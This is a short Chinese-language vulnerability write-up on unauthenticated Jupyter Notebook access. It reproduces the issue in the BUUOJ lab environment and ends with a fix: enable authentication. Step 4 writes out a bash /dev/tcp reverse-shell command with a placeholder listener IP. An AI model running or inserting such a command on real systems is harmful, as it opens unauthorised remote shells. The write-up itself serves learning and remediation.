漏洞描述
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
漏洞复现
1.用BUUOJ上的Real环境复现,网站地址:
https://buuoj.cn/login?next=%2Fchallenges%3F
2.点击后复制地址进行访问,选择创建控制台。
3.使用env命令查看当前环境变量。
4.在靶机上输入命令进行反弹shell,如下:
bash -i >& /dev/tcp/监听IP/端口 0>&1
5.反弹shell
修复建议
开启身份验证,防止未授权访问。
请登录后查看回复内容